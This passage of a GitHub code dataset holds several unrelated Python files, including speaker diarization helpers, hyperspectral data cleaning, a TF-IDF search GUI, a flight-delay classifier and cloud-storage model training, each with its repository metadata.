while k < len(word_speaker_mapping):\n line_dict = word_speaker_mapping[k]\n if (\n k < wsp_len - 1\n and speaker_list[k] != speaker_list[k + 1]\n and not is_word_sentence_end(k)\n ):\n left_idx = get_first_word_idx_of_sentence(k, words_list, speaker_list, max_words_in_sentence)\n right_idx = (get_last_word_idx_of_sentence(k, words_list, max_words_in_sentence - k + left_idx - 1) if left_idx > -1 else -1)\n if min(left_idx, right_idx) == -1:\n k += 1\n continue\n\n spk_labels = speaker_list[left_idx : right_idx + 1]\n mod_speaker = max(set(spk_labels), key=spk_labels.count)\n if spk_labels.count(mod_speaker) < len(spk_labels) // 2:\n k += 1\n continue\n\n speaker_list[left_idx : right_idx + 1] = [mod_speaker] * (right_idx - left_idx + 1)\n k = right_idx\n\n k += 1\n\n k, realigned_list = 0, []\n while k < len(word_speaker_mapping):\n line_dict = word_speaker_mapping[k].copy()\n line_dict[\"speaker\"] = speaker_list[k]\n realigned_list.append(line_dict)\n k += 1\n\n return realigned_list\n\n\ndef get_sentences_speaker_mapping(word_speaker_mapping, spk_ts):\n s, e, spk = spk_ts[0]\n prev_spk = spk\n\n snts = []\n snt = {\"speaker\": f\"Speaker {spk}\", \"start_time\": s, \"end_time\": e, \"text\": \"\"}\n\n for wrd_dict in word_speaker_mapping:\n wrd, spk = wrd_dict[\"word\"], wrd_dict[\"speaker\"]\n s, e = wrd_dict[\"start_time\"], wrd_dict[\"end_time\"]\n if spk != prev_spk:\n snts.append(snt)\n snt = {\n \"speaker\": f\"Speaker {spk}\",\n \"start_time\": s,\n \"end_time\": e,\n \"text\": \"\",\n }\n else:\n snt[\"end_time\"] = e\n snt[\"text\"] += wrd + \" \"\n prev_spk = spk\n\n snts.append(snt)\n return snts\n\n\ndef get_speaker_aware_transcript(sentences_speaker_mapping):\n speaker_aware_transcript = \"\"\n for sentence_dict in sentences_speaker_mapping:\n sp = sentence_dict[\"speaker\"]\n text = sentence_dict[\"text\"].lower()\n speaker_aware_transcript = speaker_aware_transcript + (f\"{sp}: {text} \")\n return speaker_aware_transcript\n\n\nclass Diarizer:\n \n \n \n\n def __init__(self):\n MODEL_CONFIG = str(CACHE_DIRECTORY / \"diar_infer_meeting.yaml\")\n config = OmegaConf.load(MODEL_CONFIG)\n\n config.num_workers = 1\n config.batch_size = 32\n config.diarizer.manifest_filepath = str(CACHE_DIRECTORY / \"manifest.json\")\n config.diarizer.out_dir = str(CACHE_DIRECTORY / \"diarized\")\n config.diarizer.speaker_embeddings.model_path = \"titanet_large\"\n config.diarizer.speaker_embeddings.parameters.window_length_in_sec = [1.5,1.0,0.5,]\n config.diarizer.speaker_embeddings.parameters.shift_length_in_sec = [0.75,0.5,0.25,]\n config.diarizer.speaker_embeddings.parameters.multiscale_weights = [0.33,0.33,0.33,]\n config.diarizer.speaker_embeddings.parameters.save_embeddings = False\n config.diarizer.ignore_overlap = False\n config.diarizer.oracle_vad = False\n config.diarizer.collar = 0.25\n config.diarizer.vad.model_path = \"vad_multilingual_marblenet\"\n config.diarizer.oracle_vad = False\n\n self.model = ClusteringDiarizer(cfg=config)\n\n def diarize(self, transcription, audioPath):\n MODEL_NAME = \"WAV2VEC2_ASR_LARGE_LV60K_960H\"\n DEVICE = \"cuda\"\n MODEL, METADATA = whisperx.load_align_model(language_code=\"en\", device=DEVICE, model_name=MODEL_NAME)\n resultAligned = whisperx.align(\n transcription[\"segments\"], MODEL, METADATA, audioPath, DEVICE\n )\n\n # Storing words timestamps mapping in a file.\n with open(str(CACHE_DIRECTORY / \"word_ts.text\"), \"w+\") as f:\n for line in resultAligned[\"word_segments\"]:\n line_temp = line.copy()\n line_temp[\"text\"] = 
line_temp[\"text\"].strip()\n f.write(f\"{json.dumps(line_temp)}\\n\")\n\n # Creating the manifest\n diarize_manifest = {\n \"audio_filepath\": audioPath,\n \"offset\": 0,\n \"duration\": None,\n \"label\": \"infer\",\n \"text\": \"-\",\n \"num_speakers\": None,\n \"rttm_filepath\": str(CACHE_DIRECTORY / \"diarized.rttm\"),\n \"uniq_id\": \"\",\n }\n\n with open(CACHE_DIRECTORY / \"manifest.json\", \"w\") as f:\n f.write(json.dumps(diarize_manifest))\n\n # Running diarization\n self.model.diarize()\n\n speaker_ts = []\n sampleAudio = Path(audioPath)\n with open(str(CACHE_DIRECTORY/ \"diarized\"/ \"pred_rttms\"/ (str(sampleAudio.stem) + \".rttm\")),\"r\",) as f:\n lines = f.readlines()\n for line in lines:\n line_list = line.split(\" \")\n s = int(float(line_list[5]) * 1000)\n e = s + int(float(line_list[8]) * 1000)\n speaker_ts.append([s, e, int(line_list[11].split(\"_\")[-1])])\n\n word_ts = []\n with open(CACHE_DIRECTORY / \"word_ts.text\", \"r+\") as f:\n for line in f:\n line_temp = json.loads(line)\n word_ts.append(line_temp)\n\n wsm = get_words_speaker_mapping(word_ts, speaker_ts, \"start\")\n wsm = get_realigned_ws_mapping_with_punctuation(wsm)\n ssm = get_sentences_speaker_mapping(wsm, speaker_ts)\n diarized = get_speaker_aware_transcript(ssm)\n return diarized\n\n\n","repo_name":"123xan456/Audio-Transcriber","sub_path":"audio-transcriber/DiarizationUtils.py","file_name":"DiarizationUtils.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2714918993","text":"import turtle\nimport random \n\nrunning = True\n\nwindow = turtle.Screen()\nwindow.title('Pong')\nwindow.bgcolor(\"black\")\nwindow.setup(width=800, height=600)\nwindow.tracer(0) # turn off automatic screen updates\n\n# build a paddle as a configured turtle and return it\ndef paddle(x, y, color):\n obj = turtle.Turtle()\n obj.speed(0)\n obj.shape('square')\n obj.color(color)\n obj.shapesize(stretch_wid=5, stretch_len=1)\n obj.penup()\n obj.goto(x, y)\n return obj\n\npaddle_a = paddle(-350, 0, \"white\")\npaddle_b = paddle(350, 0, \"white\")\n\ndef main():\n while running:\n window.update()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"BaileyLark/Python","sub_path":"Dec-22/Mess Around/Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18526386733","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport numpy as np\nimport glob, math, subprocess, h5py\nfrom osgeo import gdal\nimport time\nstart = time.time()\n\n#Read in reflectance hdf5 file \nhdf5_file = h5py.File('NEON_D14_SRER_DP3_511000_3520000_reflectance.h5','r')\nfile_attrs_string = str(list(hdf5_file.items()))\nprint(file_attrs_string)\nfile_attrs_string_split = file_attrs_string.split(\"'\")\nsitename = file_attrs_string_split[1]\nrefl = hdf5_file[sitename]['Reflectance']\n#Extract the wavelength datasets\nmetadata = {}\nmetadata['wavelength'] = refl['Metadata']['Spectral_Data']['Wavelength'].value\n#Extract bad band windows\nmetadata['bad_band_window1'] = (refl.attrs['Band_Window_1_Nanometers'])\nmetadata['bad_band_window2'] = (refl.attrs['Band_Window_2_Nanometers'])\n\n\ndata = gdal.Open('Reflct_red.tif')\ndata_clean = data.ReadAsArray()\n\n\n#remove bad bands (NEON)\n#1. 
define indices corresponding to min/max center wavelength for each bad band window:\nbb1_ind0 = np.max(np.where((np.asarray(metadata['wavelength'])<float(metadata['bad_band_window1'][0]))))\nbb1_ind1 = np.min(np.where((np.asarray(metadata['wavelength'])>float(metadata['bad_band_window1'][1]))))\r\n\nbb2_ind0 = np.max(np.where((np.asarray(metadata['wavelength'])<float(metadata['bad_band_window2'][0]))))\nbb2_ind1 = np.min(np.where((np.asarray(metadata['wavelength'])>float(metadata['bad_band_window2'][1]))))\r\n\nbb3_ind0 = len(metadata['wavelength'])-10\n\n#define valid band ranges from indices:\nvb1 = list(range(0,bb1_ind0)); \nvb2 = list(range(bb1_ind1,bb2_ind0))\nvb3 = list(range(bb2_ind1,bb3_ind0))\n\nvalid_band_range = [i for j in (range(0,bb1_ind0),\n range(bb1_ind1,bb2_ind0),\n range(bb2_ind1,bb3_ind0)) for i in j]\n\ndata_clean = data_clean[:,:,vb1+vb2+vb3]\n\nmetadata_clean = {}\nmetadata_clean['wavelength'] = [metadata['wavelength'][i] for i in valid_band_range]\n\n#creating 360 bands tiff file with same extent of height mosaic\nchm= gdal.Open('Height.tif')\nbn=chm.GetRasterBand(1)\ndriver = gdal.GetDriverByName(\"GTiff\")\nout = driver.Create('Reflct_BigR.tif', bn.XSize, bn.YSize, 360, 2)\nout.SetProjection(chm.GetProjection())\nout.SetGeoTransform(chm.GetGeoTransform())\nfor k,l in zip(list(range(1,361)),list(range(0,360))):\n\tout.GetRasterBand(k).WriteArray(data_clean[:,:,l]) \ndel out\nend = time.time()\nprint(\"tot time: \", (end-start))\n\n\n\n\n\n\n\n","repo_name":"Rubaya-Pervin/Savanna-fCover","sub_path":"Data_Cleaning.py","file_name":"Data_Cleaning.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42565595814","text":"class IORedirector(object):\n '''A general class for redirecting I/O to this Text widget.'''\n def __init__(self,text_area):\n self.text_area = text_area\n\nclass StdoutRedirector(IORedirector):\n '''A class for redirecting stdout to this Text widget.'''\n def write(self,str):\n self.text_area.write(str,False)\nimport sys\nimport math\nimport operator\nfrom textblob import TextBlob as tb\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport glob\nimport string\nfrom tkinter import *\n\nstop_words = set(stopwords.words(\"english\"))\nsorted_doc_score = []\nroot = Tk()\nroot.title(\"Information Retrieval (Beta v0.1)\")\nroot.geometry(\"432x400\")\n\n\ndef tf(word, blob):\n return blob.words.count(word) / len(blob.words)\n\n\ndef n_containing(word, bloblist):\n return sum(1 for blob in bloblist if word in blob.words)\n\n\ndef idf(word, bloblist):\n x = n_containing(word, bloblist)\n return math.log(len(bloblist) / (x if x else 1))\n\n\n# word is each word in all blobs\n# blob is all words in document\n# bloblist is corpus list\ndef tfidf(word, blob, bloblist):\n return tf(word, blob) * idf(word, bloblist)\n\n\ndef stop_wordss(strings):\n list = []\n str = word_tokenize(strings)\n # P to add here\n for _ in str:\n\n if _ not in stop_words:\n list.append(_)\n\n returnstring = ' '.join(list)\n #print(returnstring, \"\\n\\n\\n\\n\")\n outEntry.insert(0.0,(returnstring, \"\\n\\n\\n\\n\"))\n return returnstring\n\n\ndef unpunk(docs):\n intab = \"!()-[]{};:'\\\"\\,<>./?@#$%^&*_~\"\n outtab = \" \"\n trantab = str.maketrans(intab, outtab)\n # print(str(docs.translate(trantab)))\n return str(docs.translate(trantab))\n\n\n#\n# Initial processing Starts here and branches out.\n# #\n\n\n\ndef insertword(thword, b, p):\n print(\"\\nSearching for \", thword, \"\\n\")\n file_names = sorted(glob.glob(\"../../my_corpus/All/*\"))\n\n files = list(map(open, file_names))\n documents = []\n s = \"\"\n for file in files:\n if p:\n s = unpunk(file.read())\n else:\n s = file.read()\n if b: 
stop_wordss(s) # like a toggle\n\n documents.append(s)\n [file.close() for file in files]\n\n doc_no_list = []\n word_score = []\n doc_score_dic = {}\n #\n wordss = []\n w = word_tokenize(thword)\n # print(w)\n for wo in w:\n # print(wo,end=\"\\n\")\n wordss.append(str(wo))\n #\n bloblist = list(map(tb, documents))\n\n for i, blob in enumerate(bloblist):\n # print(\"Score in document {}\".format(i + 1))\n # scores = 0\n scores = {word: tfidf(word, blob, bloblist) for word in wordss}\n #print(scores)\n # outEntry.insert(0.0,scores)\n # ^ dictionary of words with its value\n sorted_words = sorted(scores.items(), reverse=True)\n for word, score in sorted_words[:1]:\n s = score * 100\n word_score.append(s)\n doc_no_list.append(i + 1)\n # print(\"\\tWord: {}, TF-IDF: {}\".format(word, round(s, 5)))\n\n doc_score_dic = dict(zip(doc_no_list, word_score))\n # print(doc_score_dic)\n\n sorted_doc_score = sorted(doc_score_dic.items(), key=operator.itemgetter(1), reverse=True)\n\n # print(sorted_doc_score)\n\n for item in sorted_doc_score[:10]:\n val=\"\"\n val = \"Document No : \"+str(item[0]) +\"\\n\"\n outEntry.insert(0.0,val)\n # outEntry.insert(0.0, (returnstring, \"\\n\\n\\n\\n\"))\n\n\n\ndef set_value(event):\n insertword(strVarible.get(), booleanVar.get(), punchVar.get())\n\n\nbooleanVar = BooleanVar()\nbooleanVar.set(False)\npunchVar = BooleanVar()\npunchVar.set(False)\n\nLabel(root, text=\"Enter Query\").grid(row=0, column=0, sticky=W, padx=4)\nstrVarible = StringVar()\nstrVarible.set(\"\")\nstrEntry = Entry(root, width=50, textvariable=strVarible).grid(row=0, column=1)\n\nsearchButton = Button(root, text=\"Search\")\nsearchButton.grid(row=0, column=2, padx=4, pady=4)\nsearchButton.bind(\"<Button-1>\", set_value)\n\nLabel(root, text=\"Options\").grid(row=1, column=0, sticky=W)\nRadiobutton(root, text=\"TF-IDF\", value=1).grid(row=2, column=0, sticky=W)\n\nLabel(root, text=\"Filter\").grid(row=1, column=1, sticky=W)\nstopcheck = Checkbutton(root, text=\"StopWords\", variable=booleanVar)\nstopcheck.grid(row=2, column=1, sticky=W)\n\npunchInCheck = Checkbutton(root, text=\"Remove Punctuation\", variable=punchVar)\npunchInCheck.grid(row=3, column=1, sticky=W)\n\noutEntry = Text(root, width=52, height=20)\noutEntry.grid(row=4, column=0, columnspan=10, rowspan=4)\n\nroot.mainloop()\n","repo_name":"Abhinavrana42016/NLTK_python_IR","sub_path":"GUI/test1/base1.py","file_name":"base1.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36280190238","text":"#!/usr/bin/python3\ndef text_indentation(text):\n \"\"\"\n Prints a text with 2 new lines after each of these characters: ., ? 
and :\n Args:\n text: The text to be indented\n Raises:\n TypeError: If text is not a string\n \"\"\"\n if not isinstance(text, str):\n raise TypeError(\"text must be a string\")\n\n s = text[:]\n for d in \".?:\":\n list_t = s.split(d)\n s = \"\"\n for i in list_t:\n i = i.strip(\" \")\n s = i + d if s == \"\" else s + \"\\n\\n\" + i + d\n print(s[:-3], end=\"\")\n","repo_name":"GArdennes/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35588513355","text":"import os\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\n\nfrom typing import Tuple, Union, List\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nclass DelayModel:\n\n def __init__(\n self\n ):\n self._model = None # Model should be saved in this attribute.\n\n def preprocess(\n self,\n data: pd.DataFrame,\n target_column: str = None\n ) -> Union[Tuple[pd.DataFrame, pd.DataFrame], pd.DataFrame]:\n \"\"\"\n Prepare raw data for training or predict.\n\n Args:\n data (pd.DataFrame): raw data.\n target_column (str, optional): if set, the target is returned.\n\n Returns:\n Tuple[pd.DataFrame, pd.DataFrame]: features and target.\n or\n pd.DataFrame: features.\n \"\"\"\n # Create feature generator object\n feature_generator = FeatureGenerator(data)\n # Generate features\n features = feature_generator.generate_features()\n # Target column extraction\n if target_column is not None:\n # Shuffle data to ensure that the model being trained on this data is not biased towards any particular order of the rows\n features = shuffle(features[['OPERA', 'MES', 'TIPOVUELO', 'SIGLADES', 'DIANOM', 'delay']], random_state = 111)\n # Target column extraction\n target = features['delay'].to_frame()\n else:\n # Shuffle data to ensure that the model being trained on this data is not biased towards any particular order of the rows\n features = shuffle(features[['OPERA', 'MES', 'TIPOVUELO', 'SIGLADES', 'DIANOM']], random_state = 111)\n # One-hot encoding using DS selected sub-set of features for training\n features = pd.concat([\n pd.get_dummies(features['OPERA'], prefix = 'OPERA'),\n pd.get_dummies(features['TIPOVUELO'], prefix = 'TIPOVUELO'), \n pd.get_dummies(features['MES'], prefix = 'MES')], \n axis = 1\n )\n # From feature importance analysis, the following features were selected\n top_10_features = [\n \"OPERA_Latin American Wings\", \n \"MES_7\",\n \"OPERA_Grupo LATAM\",\n \"OPERA_Sky Airline\",\n \"MES_10\",\n \"MES_8\",\n \"MES_12\",\n \"TIPOVUELO_I\",\n \"OPERA_JetSmart SPA\",\n \"MES_4\"\n ]\n # Select top 10 features for training\n features = features[top_10_features]\n # If target column is not None, return features and target as a Tuple [pd.DataFrame, pd.DataFrame], else return features dataframe\n if target_column is not None: \n return features, target\n else:\n return features\n\n def fit(\n self,\n features: pd.DataFrame,\n target: pd.DataFrame\n ) -> None:\n \"\"\"\n Fit and save Classifier model using previously preprocessed data.\n\n Args:\n features (pd.DataFrame): preprocessed data.\n target (pd.DataFrame): target.\n 
\"\"\"\n # Split data into train and test sets\n x_train, _, y_train, _ = train_test_split(\n features, \n target, \n test_size = 0.33, \n random_state = 42\n )\n ### Approach based on DS exploration notebook\n\n # # Data balance through Scaling\n # n_y0 = len(y_train[y_train == 0])\n # n_y1 = len(y_train[y_train == 1])\n # scale = n_y0/n_y1\n # # Instantiating the model using feature importance and Balanced class weight\n # self._model = LogisticRegression(\n # class_weight={1: n_y0/len(y_train), 0: n_y1/len(y_train)}\n # )\n # # Fitting the model\n # self._model.fit(x_train, y_train)\n\n ### Approach based on my ML expertise\n\n # Define hyperparameters and values to test\n param_grid = {\n 'C': [0.001, 0.01, 0.1, 1, 10, 100],\n 'solver': ['newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga'],\n 'class_weight': ['balanced']\n }\n # Define a grid search with a focus on recall\n grid_search = GridSearchCV(\n LogisticRegression(max_iter=10000), # Increased max_iter for convergence with some solvers\n param_grid, \n scoring='recall', \n cv=5\n )\n # Fit the grid search to the data\n grid_search.fit(x_train, y_train)\n # Use the best estimator found by the grid search\n self._model = grid_search.best_estimator_\n # Create model folder if it does not exist\n if not os.path.exists('model'):\n os.makedirs('model')\n # Save model using pickle\n with open('model/model.pkl', 'wb') as f:\n pickle.dump(self._model, f)\n\n def predict(\n self,\n features: pd.DataFrame\n ) -> List[int]:\n \"\"\"\n Predict delays for new flights.\n\n Args:\n features (pd.DataFrame): preprocessed data.\n \n Returns:\n (List[int]): predicted targets.\n \"\"\"\n # Load model using pickle\n with open('model/model.pkl', 'rb') as f:\n self._model = pickle.load(f)\n delay_predictions = self._model.predict(features)\n return delay_predictions.tolist()\n \nclass FeatureGenerator(object):\n \"\"\"\n Class for generating features from raw data.\n \"\"\"\n def __init__(self, data: pd.DataFrame) -> None:\n self.data = data\n\n def generate_features(self, threshold_in_minutes: int = 15) -> pd.DataFrame:\n \"\"\"\n Generate features from raw data. Return dataframe with generated features.\n\n Args:\n threshold_in_minutes (int, optional): threshold in minutes for delay. Defaults to 15.\n \n Returns:\n (pd.DataFrame): features.\n \"\"\"\n self.data['period_day'] = self.data['Fecha-I'].apply(self.get_period_day)\n self.data['high_season'] = self.data['Fecha-I'].apply(self.is_high_season)\n self.data['min_diff'] = self.data.apply(self.get_min_diff, axis=1)\n self.data['delay'] = np.where(self.data['min_diff'] > threshold_in_minutes, 1, 0)\n return self.data\n \n def get_min_diff(self, data) -> float:\n \"\"\"\n Get difference in minutes between two dates. Return difference in minutes.\n\n Args:\n data (pd.DataFrame): raw data.\n\n Returns:\n (float): difference in minutes.\n \"\"\"\n fecha_o = datetime.strptime(data['Fecha-O'], '%Y-%m-%d %H:%M:%S')\n fecha_i = datetime.strptime(data['Fecha-I'], '%Y-%m-%d %H:%M:%S')\n min_diff = ((fecha_o - fecha_i).total_seconds())/60\n return min_diff\n \n def is_high_season(self, fecha) -> int:\n \"\"\"\n Check if date is in high season. 
Return 1 if date is in high season, 0 otherwise.\n\n Args:\n fecha (str): date in format YYYY-MM-DD HH:MM:SS.\n\n Returns:\n (int): 1 if date is in high season, 0 otherwise.\n \"\"\"\n fecha_año = int(fecha.split('-')[0])\n fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')\n range1_min = datetime.strptime('15-Dec', '%d-%b').replace(year = fecha_año)\n range1_max = datetime.strptime('31-Dec', '%d-%b').replace(year = fecha_año)\n range2_min = datetime.strptime('1-Jan', '%d-%b').replace(year = fecha_año)\n range2_max = datetime.strptime('3-Mar', '%d-%b').replace(year = fecha_año)\n range3_min = datetime.strptime('15-Jul', '%d-%b').replace(year = fecha_año)\n range3_max = datetime.strptime('31-Jul', '%d-%b').replace(year = fecha_año)\n range4_min = datetime.strptime('11-Sep', '%d-%b').replace(year = fecha_año)\n range4_max = datetime.strptime('30-Sep', '%d-%b').replace(year = fecha_año)\n \n if ((fecha >= range1_min and fecha <= range1_max) or \n (fecha >= range2_min and fecha <= range2_max) or \n (fecha >= range3_min and fecha <= range3_max) or\n (fecha >= range4_min and fecha <= range4_max)):\n return 1\n else:\n return 0\n \n def get_period_day(self, date) -> str:\n \"\"\"\n Get period of day from date. Return string with period of day.\n\n Args:\n date (str): date in format YYYY-MM-DD HH:MM:SS.\n \n Returns:\n (str): period of day.\n \"\"\"\n date_time = datetime.strptime(date, '%Y-%m-%d %H:%M:%S').time()\n morning_min = datetime.strptime(\"05:00\", '%H:%M').time()\n morning_max = datetime.strptime(\"11:59\", '%H:%M').time()\n afternoon_min = datetime.strptime(\"12:00\", '%H:%M').time()\n afternoon_max = datetime.strptime(\"18:59\", '%H:%M').time()\n evening_min = datetime.strptime(\"19:00\", '%H:%M').time()\n evening_max = datetime.strptime(\"23:59\", '%H:%M').time()\n night_min = datetime.strptime(\"00:00\", '%H:%M').time()\n night_max = datetime.strptime(\"4:59\", '%H:%M').time()\n \n if(date_time > morning_min and date_time < morning_max):\n return 'mañana'\n elif(date_time > afternoon_min and date_time < afternoon_max):\n return 'tarde'\n elif(\n (date_time > evening_min and date_time < evening_max) or\n (date_time > night_min and date_time < night_max)\n ):\n return 'noche'\n \n# Creating main entrypoint for running this file as CLI for easy-testing implementation\nif __name__ == \"__main__\":\n print(\"Running model.py as CLI\")\n # Create delay model object\n model = DelayModel()\n # Execute preprocess method\n features, target = model.preprocess(\n data=pd.read_csv(filepath_or_buffer=\"/home/marlon/MachineLearning/Flight-Delay-Prediction-App/data/data.csv\"),\n target_column=\"delay\"\n )\n # Simulating test assertions for this step\n FEATURES_COLS = [\n \"OPERA_Latin American Wings\", \n \"MES_7\",\n \"OPERA_Grupo LATAM\",\n \"OPERA_Sky Airline\",\n \"MES_10\",\n \"MES_8\",\n \"MES_12\",\n \"TIPOVUELO_I\",\n \"OPERA_JetSmart SPA\",\n \"MES_4\"\n ]\n\n TARGET_COL = [\n \"delay\"\n ]\n assert isinstance(features, pd.DataFrame)\n assert features.shape[1] == len(FEATURES_COLS)\n assert set(features.columns) == set(FEATURES_COLS)\n\n assert isinstance(target, pd.DataFrame)\n assert target.shape[1] == len(TARGET_COL)\n assert set(target.columns) == set(TARGET_COL)\n # Split data into train and test sets\n _, features_validation, _, target_validation = train_test_split(features, target, test_size = 0.33, random_state = 42)\n # Execute fit method\n model.fit(\n features=features,\n target=target\n )\n predicted_target = model._model.predict(\n features_validation\n )\n report = 
classification_report(target_validation, predicted_target, output_dict=True)\n print(report)\n # execute predict method\n features = model.preprocess(\n data=pd.read_csv(filepath_or_buffer=\"/home/marlon/MachineLearning/Flight-Delay-Prediction-App/data/data.csv\")\n )\n if model._model is None:\n raise ValueError(\"Model has not been initialized or trained!\")\n predicted_targets = model.predict(\n features=features\n )\n assert isinstance(predicted_targets, list)\n assert len(predicted_targets) == features.shape[0]\n assert all(isinstance(predicted_target, int) for predicted_target in predicted_targets)\n","repo_name":"MarlonCajamarca/Flight-Delay-Prediction-App","sub_path":"challenge/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32889942951","text":"import doctest, unittest\n\nimport music21\nfrom music21 import common, corpus\n\nfrom music21 import environment\n_MOD = 'test/testPerformance.py'\nenvironLocal = environment.Environment(_MOD)\n\n#-------------------------------------------------------------------------------\nclass TestPerformance(unittest.TestCase):\n\n def runTest(self):\n pass\n\n def testTimingTolerance(self):\n '''Test the performance of loading various files\n This may not produce errors as such, but is used to provide reference\n if overall performance has changed.\n '''\n # provide work and expected min/max in seconds\n for known, max, best in [\n ('beethoven/opus59no2/movement3', 9, \n {'2009.12.14': 7.42, \n '2009.12.15': 6.686,\n '2010.06.24': 7.475,\n }),\n ('haydn/opus74no1/movement3', 5, \n {'2009.12.14': 4.08, \n '2009.12.15': 3.531,\n '2010.06.24': 3.932,\n }),\n ('schumann/opus41no1/movement2', 7, \n {'2009.12.14': 5.88, \n '2009.12.15': 5.126,\n '2010.06.24': 5.799,\n }),\n ('luca/gloria', 4,\n {'2009.12.14': 3.174, \n '2009.12.15': 2.954,\n '2010.06.24': 3.063,\n }),\n ]:\n\n t = common.Timer()\n t.start()\n x = corpus.parseWork(known, forceSource=True)\n t.stop()\n dur = t()\n environLocal.printDebug(['timing tolerance for', known, \n 'this run:', t, 'best runs:', \n ['%s: %s' % (x, y) for x, y in best.items()]])\n self.assertEqual(True, dur <= max) # performance test\n\n\n\n\nif __name__ == \"__main__\":\n music21.mainTest(TestPerformance)\n\n","repo_name":"morganecf/music21","sub_path":"music21/test/testPerformance.py","file_name":"testPerformance.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33345268558","text":"import traceback\n\nfrom . 
import igor\n\nfrom .igor import Wave, Wave1d, Wave2d\n\n__version__ = \"0.1.0\"\n\n\ndef read_itx(fname):\n \"\"\"\n Returns the list of igor waves that are included in the .itx file \n \"\"\"\n f=open(fname, 'r')\n lines=f.readlines()\n f.close()\n\n line = lines.pop(0).strip()\n if not line == \"IGOR\":\n raise IOError(\"Files does not begin with 'IGOR'\")\n\n waves = []\n while len(lines) != 0:\n try:\n wave = igor.read_wave(lines)\n if wave is not None:\n waves.append(wave)\n except Exception:\n traceback.print_exc()\n\n return waves\n\ndef write_2d_itx(fname, data, xaxis, yaxis, wavename):\n \"\"\"\n Write a 2-dimensional data as .itx file\n\n Args:\n fname: Name of the output file\n data: the 2d data\n xaxis: iterable containing (x_min, x_delta, unit)\n yaxis: iterable containing (y_min, y_delta, unit)\n wavename: name of the igor wave\n \"\"\"\n\n x = igor.Axis('x', xaxis[0], xaxis[1], xaxis[2], wavename)\n y = igor.Axis('y', yaxis[0], yaxis[1], yaxis[2], wavename)\n\n wave = Wave2d(\n data=data,\n axes=[x,y],\n name=wavename,\n )\n \n wave.write(fname)\n \n","repo_name":"nanotech-empa/igor-tools","sub_path":"igor_tools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44289089577","text":"from google.cloud import storage\nimport pandas as pd\nimport os\n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n storage_client = storage.Client.from_service_account_json('argok3s.json')\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)\n\ndef download_blob(bucket_name, source_blob_name, destination_file_name):\n storage_client = storage.Client.from_service_account_json('argok3s.json')\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n\nbucket = os.environ[\"BUCKET\"]\nprint(\"Downloading CSV...\",end=\"\")\n#change here the bucket\ndownload_blob(bucket,\"scores_processed.csv\",\"scores_processed.csv\")\nprint(\"done\")\n\nprint(\"Reading Data...\")\ndf = pd.read_csv('scores_processed.csv',sep=';', delimiter=None, header='infer')\nprint(\"done\")\n\nprint(df.head(5))\n\nprint(\"Preparing Experiment...\",end=\"\")\nfeature_cols = [\"ZONE\",\"P1\",\"P2\"]\nX = df.loc[:, feature_cols]\ny = df.FINAL\nprint(\"done\")\n\nprint(\"Generating model...\",end=\"\")\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nclf = LinearRegression().fit(X, y)\nprint(\"prediction\",clf.predict([[25,19,18]]),end=\"\")\nprint(\"done\")\n\nprint(\"Uploading model to Cloud Storage...\",end=\"\")\nfrom joblib import dump\ndump(clf, 'scores.model')\n#change here the bucket\nupload_blob(bucket,\"scores.model\",\"scores.model\")\nprint(\"done\")\n","repo_name":"sergioarmgpl/mlops-argo-k3s","sub_path":"containers/model_training/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"25532787569","text":"from .selenium_webscraper import SeleniumWebscraper\nfrom seleniumwire.utils import decode\nimport time\nfrom datetime import date, datetime\nimport json\n\n\nclass LoblawsSeleniumWebscraper(SeleniumWebscraper):\n\n def __init__(self):\n super().__init__()\n self.LOBLAWS_API_URL = (\"https://api.pcexpress.ca/\"\n 
